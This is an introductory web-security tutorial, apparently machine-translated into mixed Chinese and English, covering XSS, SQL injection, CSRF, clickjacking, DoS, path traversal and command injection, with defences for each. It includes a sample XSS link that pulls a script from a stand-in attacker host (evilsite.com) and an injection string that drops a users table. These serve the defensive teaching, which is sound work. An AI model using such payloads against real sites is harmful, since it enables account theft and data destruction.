Website security

什么是網(wǎng)站安全？

互聯(lián)網(wǎng)是一個(gè)危險(xiǎn)的地方！ 我們非常規(guī)律地聽(tīng)說(shuō)由于拒絕服務(wù)攻擊或在其主頁(yè)上顯示修改(和經(jīng)常損壞)的信息，網(wǎng)站不可用。 在其他高調(diào)案例中，數(shù)百萬(wàn)個(gè)密碼，電子郵件地址和信用卡詳細(xì)信息已泄漏到公共領(lǐng)域，從而使網(wǎng)站用戶(hù)面臨個(gè)人尷尬和財(cái)務(wù)風(fēng)險(xiǎn)。

網(wǎng)站安全的目的是防止這些(或任何)類(lèi)型的攻擊。 更正式地，網(wǎng)站安全是保護(hù)網(wǎng)站免受未經(jīng)授權(quán)的訪問(wèn)，使用，修改，破壞或中斷的行為/實(shí)踐。

有效的網(wǎng)站安全性需要整個(gè)網(wǎng)站的設(shè)計(jì)工作:在您的Web應(yīng)用程序中，在Web服務(wù)器的配置中，在您的策略中創(chuàng)建和更新密碼，以及在客戶(hù)端代碼。 雖然這一切聽(tīng)起來(lái)很不祥，但好消息是，如果你使用的是服務(wù)器端的網(wǎng)絡(luò)框架，它幾乎肯定已經(jīng)啟用了健壯和周密的防御機(jī)制來(lái)對(duì)抗一些更常見(jiàn)的攻擊"默認(rèn) "。 可以通過(guò)Web服務(wù)器配置減輕其他攻擊，例如啟用HTTPS。 最后，有公共可用的漏洞掃描程序工具，可以幫助你找出是否你犯了任何明顯的錯(cuò)誤。

本文的其余部分提供了有關(guān)一些常見(jiàn)威脅的更多詳細(xì)信息，以及您可以采取的一些簡(jiǎn)單步驟來(lái)保護(hù)您的網(wǎng)站。

網(wǎng)站安全威脅

本節(jié)列出了幾個(gè)最常見(jiàn)的網(wǎng)站威脅以及如何緩解這些威脅。 在閱讀時(shí)，請(qǐng)注意，當(dāng)Web應(yīng)用程序信任或?qū)g覽器發(fā)送的數(shù)據(jù)不夠偏執(zhí)時(shí)，威脅是如何成功的！

跨站腳本(XSS)

XSS是用于描述允許攻擊者通過(guò)網(wǎng)站將客戶(hù)端腳本注入到其他用戶(hù)的瀏覽器中的一類(lèi)攻擊的術(shù)語(yǔ)。 由于注入的代碼從站點(diǎn)到瀏覽器是可信的，因此可以進(jìn)行諸如將用戶(hù)的站點(diǎn)授權(quán)cookie發(fā)送給攻擊者的事情。 一旦攻擊者有cookie，他們可以登錄到一個(gè)網(wǎng)站，就像他們是用戶(hù)，并做任何用戶(hù)可以。 根據(jù)網(wǎng)站的不同，這可能包括訪問(wèn)其信用卡詳細(xì)信息，查看聯(lián)系方式，更改密碼等。

有兩種主要方法讓網(wǎng)站將注入的腳本返回到瀏覽器 - 這些被稱(chēng)為反映的 和持久性 XSS漏洞。

• A reflected XSS vulnerability occurs when user content that is passed to the server is returned immediately and unmodified for display in the browser — any scripts in the original user content will be run when the new page is loaded!
  For example, consider a site search function where the search terms are encoded as URL parameters, and these terms are displayed along with the results. An attacker can construct a search link containing a malicious script as a parameter (e.g. http://mysite.com?q=beer<script%20src="http://evilsite.com/tricky.js" rel="external nofollow" ></script>) and email it to another user. If the target user clicks this "interesting link", the script will be executed when the search results are?displayed. As discussed above, this gives the?attacker all the information they need?to enter the site as the target user?— potentially making purchases as the user or sharing their contact information.
• A persistent XSS vulnerability is one where the malicious script is stored by the website and then later redisplayed unmodified for other users to unwittingly execute.
  For example, a discussion board that accepts comments containing unmodified HTML could store a?malicious script from an attacker. When the comments are displayed the script is executed and can then send the attacker information required to access the user's account. This sort of attack is extremely popular and powerful, because the attacker doesn't have to have any direct engagement with the victims.
  
  While POST or GET data is the most common source of XSS vulnerabilities, any data from the browser is potentially vulnerable (including?cookie data rendered by the browser, or user files that are uploaded and displayed).

對(duì)XSS漏洞的最好防御是刪除或禁用任何可能包含運(yùn)行代碼的指令的標(biāo)記。 對(duì)于HTML，包括< script> ，< object> ，< embed> ，< link> 。

SQL注入

SQL注入漏洞使惡意用戶(hù)可以在數(shù)據(jù)庫(kù)上執(zhí)行任意SQL代碼，從而允許無(wú)論用戶(hù)權(quán)限如何訪問(wèn)，修改或刪除數(shù)據(jù)。 成功的注入攻擊可能欺騙身份，創(chuàng)建具有管理權(quán)限的新身份，訪問(wèn)服務(wù)器上的所有數(shù)據(jù)，或銷(xiāo)毀/修改數(shù)據(jù)以使其不可用。

如果傳遞給基礎(chǔ)SQL語(yǔ)句的用戶(hù)輸入可能更改語(yǔ)句的含義，則會(huì)出現(xiàn)此漏洞。 例如，考慮下面的代碼，用于列出從HTML表單提供的具有特定名稱(chēng)( userName )的所有用戶(hù):

statement = "SELECT * FROM users WHERE name = '" + userName + "';"

如果用戶(hù)輸入真實(shí)姓名，這將按預(yù)期工作。 但是，惡意用戶(hù)可以通過(guò)為 userName 指定"粗體"文本，將此SQL語(yǔ)句的行為完全更改為以下新語(yǔ)句。 修改語(yǔ)句創(chuàng)建一個(gè)有效的SQL語(yǔ)句，刪除 users 表，并從 userinfo 表中選擇所有數(shù)據(jù)(顯示每個(gè)用戶(hù)的信息)。 這是因?yàn)樽⑷氲奈谋镜牡谝徊糠? a\'; )完成原始語(yǔ)句(\'是在SQL中分隔字符串文字的符號(hào))。

SELECT * FROM users WHERE name = 'a';DROP TABLE users; SELECT * FROM userinfo WHERE 't' = 't';

避免此類(lèi)攻擊的方法是確保傳遞到SQL查詢(xún)的任何用戶(hù)數(shù)據(jù)不會(huì)更改查詢(xún)的性質(zhì)。 要實(shí)現(xiàn)此目的，一種方法是對(duì)用戶(hù)輸入中具有特殊含義的所有字符轉(zhuǎn)義 SQL。

在下面的語(yǔ)句中，我們轉(zhuǎn)義了\'字符。 SQL現(xiàn)在會(huì)將該名稱(chēng)解釋為以粗體顯示的整個(gè)字符串(確實(shí)是一個(gè)非常奇怪的名稱(chēng)，但不是有害的！)

SELECT * FROM users WHERE name = 'a\';DROP TABLE users; SELECT * FROM userinfo WHERE \'t\' = \'t';

Web框架通常會(huì)為您處理這種轉(zhuǎn)義。 例如，Django確保傳遞到查詢(xún)集(模型查詢(xún))的任何用戶(hù)數(shù)據(jù)都被轉(zhuǎn)義。

跨站點(diǎn)請(qǐng)求偽造(CSRF)

CSRF攻擊允許惡意用戶(hù)在沒(méi)有該用戶(hù)的知識(shí)或同意的情況下使用另一用戶(hù)的憑證來(lái)執(zhí)行動(dòng)作。

這種類(lèi)型的攻擊最好由例子解釋。 John是一位惡意用戶(hù)，他知道某個(gè)網(wǎng)站允許已登錄的用戶(hù)使用包含帳戶(hù)名稱(chēng)和金額的HTTP POST 請(qǐng)求將款項(xiàng)匯入指定的帳戶(hù)。 John構(gòu)建了一個(gè)表單，其中包含其銀行詳細(xì)信息和一筆金額作為隱藏字段，并通過(guò)電子郵件將其發(fā)送給其他網(wǎng)站用戶(hù)(將提交按鈕偽裝為"快速致富"網(wǎng)站的鏈接) 。

如果用戶(hù)點(diǎn)擊提交按鈕，系統(tǒng)會(huì)向服務(wù)器發(fā)送HTTP POST 請(qǐng)求，其中包含交易詳情和瀏覽器與網(wǎng)站相關(guān)聯(lián)的任何客戶(hù)端Cookie ( 將相關(guān)網(wǎng)站Cookie添加到請(qǐng)求是瀏覽器的正常行為)。 服務(wù)器將檢查cookie，并使用它們來(lái)確定用戶(hù)是否登錄并且有權(quán)進(jìn)行事務(wù)。

結(jié)果是，當(dāng)用戶(hù)在登錄到交易站點(diǎn)時(shí)點(diǎn)擊提交按鈕的將進(jìn)行交易。 約翰變得富有！

防止這種類(lèi)型的攻擊的一種方式是服務(wù)器要求 POST 請(qǐng)求包括用戶(hù)特定的網(wǎng)站生成的秘密(該秘密將由服務(wù)器在發(fā)送用于制作的網(wǎng)絡(luò)表單時(shí)提供 轉(zhuǎn)移)。 這種方法阻止John創(chuàng)建自己的表單，因?yàn)樗仨氈婪?wù)器為用戶(hù)提供的秘密。 即使他發(fā)現(xiàn)了秘密并為特定用戶(hù)創(chuàng)建了一個(gè)表單，他也不能再使用該表單來(lái)攻擊每個(gè)用戶(hù)。

Web框架通常包括這樣的CSRF預(yù)防機(jī)制。

其他威脅

其他常見(jiàn)的攻擊/漏洞包括:

• Clickjacking. In this attack a malicious user hijacks clicks meant for a visible top level site and routes them to a hidden page beneath. This technique might be used, for example, to display a legitimate bank site but capture the login credentials into an invisible <iframe> controlled by the attacker. It could alternatively be used to get the user to click a button on a visible site, but in doing so actually unwittingly click a completely different button. As a defence your site can prevent itself from being embedded in an iframe in another site by setting appropriate HTTP headers.
• Denial of Service (DoS). DoS is usually achieved by flooding a target site with spurious requests so that access to a site is disrupted for legitimate users. The requests may simply be numerous, or they may individually consume large amounts of resource (e.g. slow reads, uploading of large files, etc.) DoS defences usually work by identifying and blocking "bad" traffic while allowing legitimate messages through. These defences are typically within or before the web server (they are not part of the web application itself).
• Directory Traversal/File and disclosure. In this type of attack a malicious user attempts to access parts of the web server file system that they should not be able to access. This vulnerability occurs when the user is able to pass filenames that include file system navigation characters (e.g. ../../). The solution is to sanitize input before using it.
• File Inclusion. In this attack a user is able to specify an "unintended" file for display or execution in data passed to the server. Once loaded this file might be executed on the web server or in the client-side (leading to an XSS attack). The solution is to sanitize input before using it.
• Command Injection. Command injection attacks allow a malicious user to execute arbitrary system commands on the host operating system. The solution is to sanitize user input before it might be used in system calls.

還有更多。 有關(guān)完整的列表，請(qǐng)參閱類(lèi)別:Web安全漏洞(維基百科)和 external">類(lèi)別:攻擊(打開(kāi)Web應(yīng)用程序安全項(xiàng)目)。

一些關(guān)鍵消息

當(dāng)Web應(yīng)用程序從瀏覽器信任數(shù)據(jù)時(shí)，前面幾節(jié)中的幾乎所有漏洞都會(huì)成功。 無(wú)論您為提高網(wǎng)站安全性做了什么，您都應(yīng)該清理所有用戶(hù)發(fā)起的數(shù)據(jù)，然后在瀏覽器中顯示，在SQL查詢(xún)中使用，或傳遞到操作系統(tǒng)或文件系統(tǒng)調(diào)用。

您可以采取的其他一些具體步驟有:

• Use more effective password management. Encourage strong passwords that are changed regularly. Consider two-factor authentication for your site, so that in addition to a password the user must enter another authentication code (usually one that is delivered via some physical hardware that only the user will have, such as a code in an SMS sent to their phone).
• Configure your web server to use HTTPS and HTTP Strict Transport Security (HSTS). HTTPS encrypts data sent between your client and server. This ensures that login credentials, cookies, POST data and header information are all much less available to attackers.
• Keep track of the most popular threats (the current OWASP list is here) and address the most common vulnerabilities first.
• Use vulnerability scanning tools to peform automated security testing on your site (later on, your very successful website may also find bugs by offering a bug bounty like Mozilla does here).
• Only store and display data that you need to. For example, if your users must store sensitive information like credit card details, only display enough of the card number that it can be identified by the user, and not enough that it can be copied by an attacker and used on another site. The most common pattern these days is to only display the last 4 digits of a credit card number.

Web框架可以幫助減輕許多更常見(jiàn)的漏洞。

概要

本文已解釋了網(wǎng)絡(luò)安全的概念，以及您的網(wǎng)站應(yīng)該嘗試保護(hù)的一些更常見(jiàn)的威脅。 最重要的是，您應(yīng)該明白，Web應(yīng)用程序不能信任來(lái)自Web瀏覽器的任何數(shù)據(jù)！ 所有用戶(hù)數(shù)據(jù)應(yīng)在顯示之前進(jìn)行清理，或在SQL查詢(xún)或文件系統(tǒng)調(diào)用中使用。

這是此模塊的結(jié)束，涵蓋您在服務(wù)器端網(wǎng)站編程中的第一步。 我們希望您喜歡學(xué)習(xí)基本概念，現(xiàn)在您可以選擇一個(gè)Web框架并開(kāi)始編程。